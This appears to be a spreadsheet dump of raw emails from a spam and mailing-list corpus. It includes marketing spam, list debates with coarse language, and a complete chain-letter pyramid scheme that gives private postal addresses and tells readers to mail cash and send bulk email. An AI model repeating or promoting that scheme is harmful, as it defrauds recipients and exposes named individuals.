                   &lt;/font&gt; &lt;font face=Arial size=2&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000"&gt;Hello,&lt;br&gt;
                   &lt;br&gt;
                   I have visited &lt;a href='http://iiu.taint.org'&gt;iiu.taint.org&lt;/a&gt; and noticed that your website is not listed on some search engines.
                   I am sure that through our service the number of people who visit your website will definitely increase. &lt;a target=_blank href="http://www.seekercenter.net/index.php"&gt;SeekerCenter&lt;/a&gt; 
                   is a unique technology that instantly submits your website 
                   to over 500,000 search engines and directories  
                   -- a really low-cost and effective way to advertise your site. 
                   For more details please go to &lt;a target=_blank href="http://www.seekercenter.net/index.php"&gt;SeekerCenter.net&lt;/a&gt;.&lt;br&gt;
                   &lt;br&gt;
                   Give your website maximum exposure today!&lt;BR&gt;
                   Looking forward to hearing from you.&lt;br&gt;
                   &lt;BR&gt;
                   &lt;table border=0 width=100%&gt;&lt;TR&gt;&lt;TD width=50%&gt;
                   &lt;font face="Verdana, Arial, Helvetica, sans-serif" size=2 color="#000000"&gt;Best 
                   Regards,&lt;br&gt;
                   Vanessa Lintner&lt;br&gt;
                   Sales &amp;amp; Marketing &lt;br&gt;
                   &lt;a target=_blank href="http://www.seekercenter.net/index.php"&gt;www.SeekerCenter.net&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;
                   &lt;TD&gt;&lt;td width=50%&gt;
                    &lt;div align="center" valign=middle&gt;
                    &lt;form target=_blank action=http://www.seekercenter.net method=POST&gt;
                           &lt;input type="submit" name="Submit" value="Signup Now!!!" class="stbtm"&gt;
                    &lt;/form&gt;
                         &lt;/div&gt;
                   &lt;/TD&gt;
                   &lt;/TR&gt;
                   &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;td width="242" height="64" valign="bottom"&gt; 
             &lt;table width="257" border="0" cellspacing="0" cellpadding="0"&gt;
                 &lt;tr&gt;
                   &lt;td colspan="3" height="2"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                   &lt;td colspan="3" height="3"&gt; 
                   &lt;p&gt;&lt;img src="http://image.seekercenter.net/letter_top01.jpg" width="326" height="15"&gt;&lt;/p&gt;
                     &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; 
                   &lt;td colspan="3"&gt;&lt;img src="http://image.seekercenter.net/letter_right01.jpg" width="31" height="185"&gt;&lt;A target=_blank Href ="http://iiu.taint.org"&gt;&lt;IMG Src =http://image5.seekercenter.net/image935/1/54/img392.jpg Border=0 width="256" height="184"&gt;&lt;/A&gt;&lt;img src="http://image.seekercenter.net/letter_left01.jpg" width="14" height="185"&gt;&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;tr&gt; 
                 &lt;td colspan="3" height="80" background="http://image.seekercenter.net/letter_bottom01.jpg"&gt; 
                   &lt;table width="326" border="0" cellspacing="0" cellpadding="0" height="80"&gt;
                     &lt;tr&gt;
                       &lt;td width="36" height="43"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="157" height="43"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="134" height="43"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="36" height="2"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="157" height="2"&gt;&amp;nbsp;&lt;/td&gt;
                       &lt;td width="134" height="2"&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt; &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
   &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">bitbitch@magnesium.net wrote:
 &gt;&gt;&gt;Wishful thinking. People are just bigger dickheads now. Culture is changing
 &gt;&gt;&gt;and it is becoming acceptable to get in peoples face and shout them down
 &gt;&gt;&gt;when you disagree with them.  The people that do this are NOT
 &gt;&gt;&gt;disenfranchised. They
 &gt;&gt;&gt;get their rocks off on being disagreeable assholes. The act of protesting is
 &gt;&gt;&gt;more important than the actual issue being protested for most of these
 &gt;&gt;&gt;people.
 &gt;&gt;&gt; 
 &gt;&gt;&gt;
 &gt;&gt;&gt;      
 &gt;&gt;&gt;
 &gt;OB&gt; In my experience, this is classic "American" behaviour, and I don't 
 &gt;OB&gt; think its on the increase outside of the US of A.
 &gt;OB&gt; I am willing to accept the premise that Americans are bigger dickheads 
 &gt;OB&gt; then they used to be.
 &gt;
 &gt;*sighs*
 &gt;
 &gt;Right.  Because Americans are the only people capable of being
 &gt;assholes.  Shit.  History keeps fucking up when they keep mentioning
 &gt;all the historical examples of dickhead-ness that have proceeded the
 &gt;US.
 &gt;
 &gt;After all, we're the only country who gets unruly when it comes to
 &gt;issues.   Thats why its always just the Americans at those crazy WTO
 &gt;meetings...  Right, Owen?
 &gt;
 &gt;
 &gt;
 &gt;  
 &gt;
 A flippant remark that I will probably regret  - sure there's assholes 
 everywhere. I just remember a lunch in Spain with
 a semi-famous American - I think we had about 10 nationalities at the 
 table, and he managed to insult each of them within
 15 minutes. A historical perspective makes me think that empires - 
 Roman, British, Russian, American, whatever - produce
  a larger proportion of assholes than subject nations (and are more 
 likely to have them in positions of authority).
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Michael wrote:
 &gt; 
 &gt; http://www.post-gazette.com/columnists/20020905brian5.asp
 I thought this nekkid URL was going to be about the
 infringement of 1st amendment rights for broadcasters
 and proposed campaign finanice restrictions preventing them
 from making money on advertisements that are deemed
 thinly veiled campaign contributions by some arbitrary
 government board.  As it was posted to "discussion" I
 thought there'd be some.
 Instead it's a Post-Gazette column by Brian O'Neill
 lamenting the fact that some people know how to
 fill out a permit so that they can take advantage
 of their right to peaceable assembly.  Obviously
 he's poking fun at the idea that specific groups
 get specific "zones" and that it's not up to the
 police to decide what messages and signs get put into
 what zones to most expediently keep order.  
 The problem is that politics have gotten so muddied
 nowadays, that shouting down and unpeaceably disrupting
 political rallies that you don't agree with has become
 common practice.  The courts have constantly ruled
 that there are some restrictions on the first amendment.
 They teach you that your very first year of law school.
 I think that given the information as laid out by the story,
 Mr. O'Neill has confused free speech with action.  Free
 speech or even protected speech as practiced by almost 
 every American seems to involve the ability to communicate
 an idea to an unknown audience.  Action involves directing
 a specific comment to a specific well-defined individual or audience
 that has immediate, harmful, and sometimes physical 
 effects that is easily forseeable by any reasonable person. 
 I think Bill Neel of Butler needs to go back to school
 as obviously he must have been sleeping in his civics
 class or else they didn't teach civics in mini-guantanamo, OH
 65 years ago.
 Greg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Re[2]: Goodbye Global Warming
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; From: bitbitch@magnesium.net [mailto:bitbitch@magnesium.net]
 &gt; 
 &gt; Burbank says the tax would reach only a pre-selected group of
 &gt; consumers who are wealthier than those who drink drip. So, he's been
 &gt; pitching it as a modern-day Robin Hood tax, where the needy get a dime
 &gt; every time the affluent spend $3 to $4 on an espresso.
 The people who pour the espresso aren't rich.  An interesting issue
 might be how it affects employment.
 Still, it is a 1% or less sales tax.  That might not make that big of a
 difference.  
 The costs of tracking revenue and collecting the tax might be onerous.
 Worse than the cost of the tax itself.
 Me: I hate coffee anyway.  But if they put a $.10/can tax on Diet Dr.
 Pepper I might have to start buying them in Oregon.  (Yes, I drink that
 much Diet Dr. Pepper).
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Liddle quits Today with new BBC deal
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418828,215/
 Date: 2002-10-01T04:33:56+01:00
 *Media:* The race is on for the most coveted job in BBC News after Rod Liddle 
 says he is stepping down as editor of the Today programme.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: PROTECT YOUR COMPUTER AGAINST HARMFUL VIRUSES! 21198
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Language" content=3D"en-us"&gt;
 &lt;meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0"&gt;
 &lt;meta name=3D"ProgId" content=3D"FrontPage.Editor.Document"&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
 1252"&gt;
 &lt;title&gt;Norton AD&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table border=3D"3" cellspacing=3D"3" width=3D"469" cellpadding=3D"3" bgco=
 lor=3D"#000080"  bordercolor=3D"#FFFFFF" style=3D"border-collapse: collaps=
 e" bordercolordark=3D"#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width=3D"447"&gt;&amp;nbsp;
       &lt;table border=3D"1" width=3D"100%" bgcolor=3D"#FFFFFF" bordercolor=3D=
 "#000080"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" align=3D"center"&gt;&lt;font face=3D"Impact" size=3D=
 "4" color=3D"#CC0000"&gt;ATTENTION:
             This is a MUST for &lt;u&gt;ALL&lt;/u&gt; Computer Users!!!&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"center"&gt;&lt;font size=3D"3" face=3D"Verdana"&gt;&lt;b&gt;&amp;nbsp;&lt;font=
  color=3D"#FFFFFF"&gt;*NEW
       - Special Package Deal!*&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;table border=3D"8" width=3D"100%" height=3D"86" bgcolor=3D"#FFFFFF"=
  bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"80" align=3D"center"&gt;&lt;font face=3D"=
 Verdana, Arial, Helvetica, sans-serif" color=3D"#000099" size=3D"5"&gt;&lt;b&gt;Nor=
 ton
             SystemWorks 2002 Software Suite&lt;br&gt;
             -&lt;i&gt;Professional Edition&lt;/i&gt;-&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"62"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"56" align=3D"center"&gt;&lt;b&gt;&lt;font face=3D=
 "Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;Includes
             Six - &lt;/font&gt;&lt;i&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFF=
 F00"&gt;Yes 6!&lt;/font&gt;&lt;/i&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt; =
 - Feature-Packed Utilities&lt;br&gt;ALL
             for &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF00"&gt;=
 1&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Special &lt;/font&gt;&lt;font face=3D"Tahoma" size=3D"4" color=3D"#FFFF=
 00"&gt;LOW&lt;/font&gt;&lt;font face=3D"Tahoma" color=3D"#FFFFFF" size=3D"4"&gt;
             Price!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table border=3D"0" width=3D"100%" height=3D"115" bgcolor=3D"#000080=
 " bordercolor=3D"#FFFFFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"109"&gt;&lt;b&gt;&lt;font face=3D"Tahoma" size=3D=
 "2" color=3D"#FFFF00"&gt;This Software Will:&lt;/font&gt;&lt;font face=3D"Tahoma" size=
 =3D"2" color=3D"#FFFFFF"&gt;&lt;br&gt;- Protect your
             computer from unwanted and &lt;i&gt; hazardous&lt;/i&gt; viruses&lt;br&gt;- Help=
  secure your
             private &amp;amp; valuable information&lt;br&gt;- Allow you to transfer =
 files
             and send e-mails &lt;u&gt; safely&lt;/u&gt;&lt;br&gt;- Backup your ALL your data=
  quick and
             easily&lt;br&gt;- Improve your PC's performance w/&lt;i&gt;superior&lt;/i&gt;
             integral diagnostics!&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&amp;nbsp;
       &lt;table border=3D"4" width=3D"100%" height=3D"4" bgcolor=3D"#FFFFFF" =
 bordercolor=3D"#FFFF00"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"1"&gt;
             &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"5"&gt;&lt;font=
  color=3D"#000000"&gt;&lt;font color=3D"#ff0000"&gt;6&lt;/font&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;Feature-Packed Utilities&lt;br&gt;&lt;/f=
 ont&gt;&lt;font color=3D"#000000"&gt;
             &lt;/font&gt;&lt;u&gt;&lt;font color=3D"#ff0000"&gt;1&lt;/font&gt;&lt;/u&gt;&lt;u&gt;&lt;font color=3D=
 "#000000"&gt; 
             &lt;/font&gt;&lt;font color=3D"#000080"&gt; Great
             Price&lt;/font&gt;&lt;/u&gt;&lt;font color=3D"#000000"&gt; &lt;br&gt;
             &lt;/font&gt;&lt;font color=3D"#000080"&gt;
             A&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font color=3D"#ff0000"&gt;$300+=
 &lt;/font&gt;  &lt;/font&gt;&lt;font color=3D"#000080"&gt; Combined Retail Value
             &lt;i&gt;YOURS&lt;/i&gt; for Only&lt;/font&gt;&lt;font color=3D"#000000"&gt; &lt;font col=
 or=3D"#ff0000"&gt;$29.99!&lt;/font&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"4"&gt;&lt;font color=3D=
 "#000080"&gt;&amp;lt;Includes
             &lt;/font&gt;&lt;font color=3D"#FF0000"&gt;FREE&lt;/font&gt;&lt;font color=3D"#0000=
 80"&gt; Shipping!&amp;gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;p align=3D"Center"&gt;&lt;b&gt; &lt;font face=3D"Arial, Helvetica, sans-serif"  c=
 olor=3D"#ffffff"&gt;Don't fall prey to destructive viruses
     or hackers!&lt;br&gt;Protect&amp;nbsp; your computer and your valuable  informat=
 ion
     and&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;table border=3D"1" width=3D"100%" height=3D"44" bordercolor=3D"#FFF=
 FFF"&gt;
         &lt;tr&gt;
           &lt;td width=3D"100%" height=3D"38" bgcolor=3D"#0000FF" align=3D"ce=
 nter"&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"4" color=3D"#FFFFFF"&gt;
           &lt;a style=3D"color: #FFFFFF; font-family: Verdana; font-size: 14p=
 t; font-weight: bold" href=3D"http://64.251.22.98/affiliates/norton/system=
 works.htm"&gt;-&amp;gt;
             CLICK HERE to Order Yours NOW! &amp;lt;-&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p align=3D"Center"&gt;&lt;b&gt;&lt;font face=3D"Arial" size=3D"5"&gt;
       &lt;a style=3D"text-decoration: none; background-color: rgb(255,255,0);=
  color: #0000FF" href=3D"http://64.251.22.98/affiliates/norton/systemworks=
 .htm"&gt;Click
       here for more information&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
       &lt;p align=3D"Center"&gt;&lt;font face=3D"Tahoma" size=3D"1" color=3D"#fffff=
 f"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
       &lt;/font&gt;&lt;p align=3D"Center"&gt;&lt;font color=3D"#ffffff" size=3D"1" face=3D=
 "Tahoma"&gt;Your
       email address was obtained from an opt-in list. Opt-in MRSA List&lt;br&gt;
       &amp;nbsp;Purchase Code # 312-1-010.&amp;nbsp;&amp;nbsp;If you wish to be unsubs=
 cribed
       from this list, please &lt;a style=3D"COLOR: #ffffcc" href=3D"mailto:re=
 moveme@btamail.net.cn?Subject=3DUnsubcribe Immediately"&gt;Click
       here&lt;/a&gt; and press send to be removed. If you have previously unsubs=
 cribed
       and are still receiving this message, you may email our &lt;a style=3D"=
 COLOR: #ffffcc" href=3D"mailto:sortofridiculous@bigfoot.com?Subject=3DAbus=
 e Report"&gt;Spam
       Abuse Control Center&lt;/a&gt;. We do not condone spam in any shape or for=
 m.
       Thank You kindly for your cooperation.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">John Hall wrote:
 &gt;It wasn't gloating, it was one for the horror file.
 &gt;
 &gt;And of course for the Palestinians it wasn't a mistake, which is a key
 &gt;part of the horror.
 &gt;
 &gt;I'm not against American taxpayers remodeling a school honoring a killer
 &gt;if we do it with a daisy cutter.
 &gt;
 &gt;
 &gt;  
 &gt;
 I'm sure the plan is that it will be renamed for the settler who kills 
 the last Palestinian in a few years.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Internet marketing &amp; communications; earn $100k/year... uleio
</t>
  </si>
  <si>
    <t xml:space="preserve">HELLO...By reading the short Summary just below, you
 will see how you can learn new skills in communication,
 do a direct marketing program on the internet, and at the
 same time, earn $100,000 or more to enable you to
 CHANGE YOUR LIFE!!!
 ************SUMMARY***************************
 Just read this Summary, follow the actions that it advises,
 and start earning some serious money.  You will learn new
 skills in communications and how to market on the internet.
 What a Deal!  Your total cash investment is just $50.00.
 Step 1.  If this is the first time you have seen this message,
 and you have not joined in this program before, then
 take out five US$10.00 bills (total $50 investment), and mail
 out $10.00 each to the following people to purchase five
 Guides on communications.  For each Guide that you will
 be ordering and buying, write out on a sheet of plain white
 paper, your own name, address, and YOUR OWN EMAIL
 ADDRESS, and the number and name of the Guide that
 you are buying.  Then fold the paper, put the $10.00 bill
 inside the sheet of paper, insert the paper and $10.00 bill
 into an envelope, address the envelope with the name and
 address of the person whose name is shown under each
 Guide below, and mail the envelope by first class or air
 mail. Be sure to put enough postage stamps on the
 envelopes.  No need to send by registered mail.
 LIST OF FIVE NAMES****************************
 ________________________________________________
 GUIDE# 1: "How to be A More Effective Public Speaker"
 Order Guide #1 for US$10.00 CASH from: (In addition to
 Guide #1, you will receive a valuable marketing Guide
 "A Million Bucks From the Internet", free of charge)
 Derrick Nguyen	
 9530 Whitmore St	
 El Monte, CA 91733	
 USA
 ________________________________________________
 GUIDE # 2: "How to Give a Business Presentation"
 Order Guide # 2 for US$10.00 CASH from:
 Tim Fai
 GPO Box 260
 Macau (via Hong Kong)
 ________________________________________________
 GUIDE# 3: "How to Write More Effectively"
 Order Guide # 3 for US$10.00 CASH from:
 Luis Pastor
 Apartado 81
 48080 Bilbao
 Spain
 ________________________________________________
 GUIDE # 4: "What to do at a Social Function"
 Order Guide # 4 for US$10.00 CASH from:
 Chester Waldvogel
 11 Chestnut Way
 Berlin, MD 21811
 USA
 ________________________________________________
 GUIDE # 5: "How To Sharpen Your Mind"
 Order Guide # 5 for US$10.00 CASH from:
 J. Siden
 Krondikesvagen 54 A
 83147 Ostersund
 Sweden
 ________________________________________________
 END OF LIST OF FIVE NAMES*********************
 Step 2.  These Guides will be emailed to you.  Save these
 Guides on your computer's hard disk as other people will be
 ordering these Guides from you, paying you for them and
 you will need to email the Guides to the new buyers.
 Step 3.  From the list of names above, delete the name and
 address of the person shown under GUIDE#5, and replace that
 slot with the name and address of the person from GUIDE #4's
 slot.  Be sure to copy the name and address exactly as shown.
 Check the address again.
 Step 4.  Delete name and address under GUIDE #4, and
 replace with the name and address from GUIDE #3's slot.
 Step 5.  Delete name and address under GUIDE #3, and
 replace with the name and address from  GUIDE#2's slot.
 Step 6.  Delete name and address under GUIDE #2, and
 replace with the name and address from GUIDE #1's slot.
 Step 7.  Delete name and address under GUIDE #1, and
 replace with YOUR OWN NAME AND ADDRESS. This
 step is how your own name and address is entered into the
 list of names to receive orders for the Guides. Eventually,
 your own name will go down the list of names until you have
 reached GUIDE #5, and then be dropped from the list. The
 key point is that the number of people ordering Guides from
 you will grow larger the lower down the list your name goes.
 Step 8.  Once you have completed this new list, send out
 this new email (which shows your name under GUIDE #1) to
 as many email addresses as possible, as many as 100,000
 emails or even more.  The greater the number of mailings
 you make, potentially the greater the number of people who
 will order the GUIDE #1 from you.  These people will then
 make new emails to send out to their addresses with the email
 showing your name under GUIDE #2, and so on.
 This is all you need to do.  If you wish to read the rest of
 this email message, then do so.  If not, just do the 8 steps
 shown above. Remember, the key point is to send out as
 many emails as possible in step 8, and to encourage and help
 those who purchase the Guides from you to send out
 emails of their own.
 Do NOT change anything other than what is instructed.
 Because if you do, it will not work for you.  Your immediate
 reaction might be: Why not replace all the names on the list
 with the names of your spouse, kids, relatives, and friends.
 That might seem to you like a clever move because new
 buyers will be sending their money to these people.  But
 that move is the exact opposite of what is to your benefit.
 What will benefit you most is having people who will send
 out emails, seek new buyers, and provide assistance to new
 buyers. If the people you slip into that list aren't going to
 be sending new emails, you're only hurting yourself by
 effectively closing down the program with your name on
 top of the list of the names that you have inserted.  There
 wouldn't be new buyers coming in. So, your sly maneuver
 will gain you exactly zero!  Furthermore, if you have done
 the work, and your name has worked its way to further
 down the list, by then you deserve the rewards and
 earnings from that effort, and it would be unethical for
 anyone to remove your name for whatever reason.  Don't
 do it to others. Remember, honesty reaps the reward!!!
 You may have a concern that after sending the total $50 to
 the five people on the list that one of the people will just
 take your money, and not send you the Guide.  Well, rest
 assured.  As we said above, it's to our benefit to have you
 as a satisfied buyer who will actively send out emails to find
 new buyers.  So don't think the people on the list will try to
 cheat you or to "stiff" you for $10.00.  The people on the list
 would rather have you working hard because your effort will
 benefit them as well as you.  Later on, when other buyers send
 you the order to buy the Guides, fulfill your end of the deal
 by sending the ordered Guide to the buyer.  Don't cheat.
 Provide efficient and honest service and we will all benefit.
 ******END OF SUMMARY************************
 =======REST OF MESSAGE======================
 With easy-to-use email tools and opt-in email, success in
 this business is now well within the capabilities of ordinary
 people who may not have done any internet marketing before.
 And the earnings potential is staggering!
 READ THIS EMAIL TO THE END! -
 follow what it says  - and you will not worry whether a
 RECESSION is coming or not, or whether or not you can
 afford to buy that new car or home that you have been
 looking for.  Yes, I know what you are thinking. I never
 responded to one of these before either. One day though,
 something made me feel: "You use $50 going to a movie
 for 2 hours with your spouse, friend, or child, plus a simple
 meat at a restaurant.  Why the heck not?"  No matter where
 you believe those "feelings" came from, I thank every day
 that feeling came over me.
 I cannot imagine where I would be or what I would be doing
 had I not. Read on. It works.  And when you read the Guides,
 Youll learn how to become a more effective communicator.
 What can be better?  A way to improve your self-image and
 confidence and at the same time have the potential to recover
 your investment and make some good money: making over
 half a million dollars every 4 to 5 months from your home.
 If you work on this program, you will learn a lot about direct
 marketing on the internet.  If you believe direct marketing
 via the internet is the way sales and marketing will be done
 in the future, then the experience you will gain here could
 be a real boost in your work career, possibly even providing
 a new career for you.
 = PRINT THIS MESSAGE FOR FUTURE REFERENCE =
 If you want to make serious money, read this message until
 you understand it completely and feel confident to follow
 through on what it advises.
 FOLLOW THE SIMPLE INSTRUCTION ABOVE AND
 YOUR FINANCIAL DREAMS CAN COME TRUE!
 Remember, this method has been tested, and if you alter it,
 it will NOT work!  This IS a legitimate BUSINESS. You
 are offering a product for sale to a buyer. Treat it as such
 and you can see money coming to you  in a reasonable period
 of time, depending on the collective efforts of yourself and
 the others on the list of five.
 ===========================================
 *** Take this entire email, with the modified list of names,
 and save it on your computer. DO NOT MAKE ANY OTHER
 CHANGES.  There are 2 methods to get this venture going:
 METHOD # 1: BY SENDING BULK EMAIL LEGALLY
 ===========================================
 Let's say that you start small, to see how it goes, and that
 you and those involved send out only 5,000 emails each.
 Let's also assume that the mailing receives only a 0.1%
 (1/10 of 1%) response (the response could be much better
 but let's just say it is only 0.1%). Also many people will
 send out hundreds of thousands of emails instead of only
 5,000 each.
 Out of your 5,000 emails and a 0.1% response, that is only
 5 orders for Guide # 1. Those 5 people who responded also
 send out 5,000 emails each for a total of 25,000. Out of
 those 25,000 emails only 0.1% responded with orders.
 That's 25 people who responded and ordered Guide # 2.
 Those 25 people mail out 5,000 e-mails each for a total of
 125,000 emails. The 0.1% response to that is 125 orders
 for Guide # 3. Those 125 people send 5,000 emails each
 for a total of 625,000 emails sent out. The 0.1% response
 is 625 orders for Guide # 4.
 Those 625 people send out 5,000 emails each for a total
 of 3,125,000 emails. The 0.1% response to that is  3,125
 orders for Guide # 5, or $31,250 at $10 per Guide.  This
 may seem a small amount to you, but remember we used a
 very low response rate with a small number of emails being
 sent out.  See what happens if you can get the response rate
 up just slightly.
 If Response Rate is 0.1%, income from Guides #1 - #5 is:
 $50+250+1,250+6,250+31,250 = $39,050 (as above)
 If Response Rate is 0.15%, income from Guides #1 - #5 is:
 $75+560+4,220+31,640+237,300 = $273,795
 If Response Rate is 0.2%, income from Guides #1 - #5 is:
 $100+1,000+10,000+100,000+1,000,000 = $1,111,100
 Dare to think for a moment what would happen if everyone
 or half or even one 4th of those people mailed 100,000
 emails each or more?  From the example above, you can see
 the power of leveraging, that is, how much greater is the
 amount of money from a small increase in the response rate.
 There are over 200 million people on the internet worldwide
 and counting, with thousands more coming online every day.
 METHOD # 2: PLACING FREE ADS ON THE INTERNET
 ===========================================
 Advertising on the net is very, very inexpensive and there are
 Many FREE places to advertise. Placing a lot of free ads on
 the internet will get a response. We strongly suggest you start
 with  Method # 1 and add METHOD # 2 as you go along.
 For every $10 you receive, all you must do is email the
 Guide the buyer ordered. Always provide same day service.
 The people you buy these Guides from will assist and advise
 you how to get the large number of email addresses that
 you need to send the new email containing your name and
 address.  In return, when others buy the Guides from you,
 you also should help those buyers to resell the Guides to
 their email addresses.  This will benefit you because your
 name would be further down the list, and their new buyers
 will buy from you.  This is no different than "customer
 service" in the retail or the  "bricks and mortars" business.
 ===========AVAILABLE GUIDES ==============
 The reason for the "cash" is not because this is illegal or
 somehow  "wrong". It is simply about time. Time for checks
 or credit cards to be cleared or approved, etc. Concealing it
 is simply so no one can SEE there is money in the envelope
 and steal it before it gets to you.
 ORDER EACH GUIDE BY ITS NUMBER &amp; NAME ONLY.
 Always send a single $10 bill (U.S. CURRENCY) for each
 Guide.  Checks NOT accepted. Make sure the cash is hidden
 by wrapping it in at least 2 sheets of paper. On one of
 those sheets of paper, write the NUMBER &amp; the NAME
 of the Guide you are ordering, YOUR EMAIL ADDRESS
 and your name and postal address.  Be sure to address the
 envelope correctly and put the proper amount of stamps to
 mail the envelope.
 PLACE YOUR ORDER FOR THESE GUIDES NOW
 FROM THE NAME AND ADDRESS LIST SHOWN
 AT THE BEGINNING OF THIS EMAIL
 ________________________________________________
 YOUR SUCCESS GUIDELINES
 === If you do not receive at least 10 orders for GUIDE #1
 within 2 weeks, continue sending emails until you do.
 === Two to three weeks after you receive 10 orders,
 you should receive 100 orders or more for GUIDE #2. If
 not, continue advertising or sending emails until you do.
 Once you have received 100 or more orders for GUIDE # 2,
 YOU CAN SEE THE PROGRAM IS WORKING, and
 cash should continue coming in! THIS IS IMPORTANT
 TO REMEMBER:  Continue to assist new buyers with advice
 and instruction on how to send out more emails. You can
 KEEP TRACK of progress by noting which guides people
 are ordering from you. IF YOU WANT TO GENERATE
 MORE INCOME SEND ANOTHER BATCH OF EMAILS
 AND START THE WHOLE PROCESS AGAIN.
 There is NO LIMIT to the income you can generate !!!
 ===========================================
 A NOTE FROM THE ORIGINATOR OF THIS PROGRAM:
 You have just received information that can give you
 financial freedom to really change your life, but I don't
 wish to kid you:  This requires A BIT OF EFFORT. You
 can make more money in the next few weeks and months
 than you have ever imagined. Follow the program
 EXACTLY AS INSTRUCTED.
 Remember to email the revised copy of this email after you
 have put your name and address in GUIDE#1 and moved
 others to #2 .....# 5 slots as instructed above. One of the
 people you send this to may send out 100,000 or more
 emails and your name will be on every one of them.
 Remember, the more you send out the more potential
 buyers you will reach.
 IT IS UP TO YOU!  ORDER THE GUIDES NOW AND
 EMBARK ON THE ROAD TO FINANCIAL SECURITY!
 Upon your purchase of any GUIDE #1 through #5, the
 Copyright owner assigns to you two important rights:
 (1) The right to resell and to distribute via the internet the
 GUIDE that you have purchased, and (2) the right to assign
 to your buyer of the GUIDE, the further right for your buyer
 to resell that GUIDE.  Included in your purchase of Guide #1
 is a valuable report on how to market on the Internet. It's
 free of charge and will give you the tools you need.
 The right to print any of the material contained in the GUIDES
 is reserved exclusively for the copyright owner.  Your right to
 resell and to distribute copies of the GUIDE applies only to the
 internet and/or world wide web via electronic distribution.
 YOU MAY NOT PRINT OUT THE GUIDES TO SELL OR
 DISTRIBUTE IN ANY WAY.  You may print a copy of the
 Guides for your own personal use to enhance your
 communication skills.
 ===========================================
 * This message is not intended for residents of localities that
 have legal ordinances prohibiting engaging in such programs.
 Screening of addresses has been done to the best of our ability.
 This message is only being sent once to recipients and thus
 is no need to remove your email address from our mailing
 list.  You will not be receiving further emails with this message.
 iangxsifpkvgobwlxwhvvxfs
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Free Adult Videos To: yyyy@netnoteinc.com ID: wmcn
</t>
  </si>
  <si>
    <t xml:space="preserve">To: yyyy@netnoteinc.com
 ############################################
 #                                          #
 #       Adult Online Super Store           #
 #              Shhhhhh...                  #
 #     You just found the Internet's        #
 #          BEST KEPT SECRET!!!             #
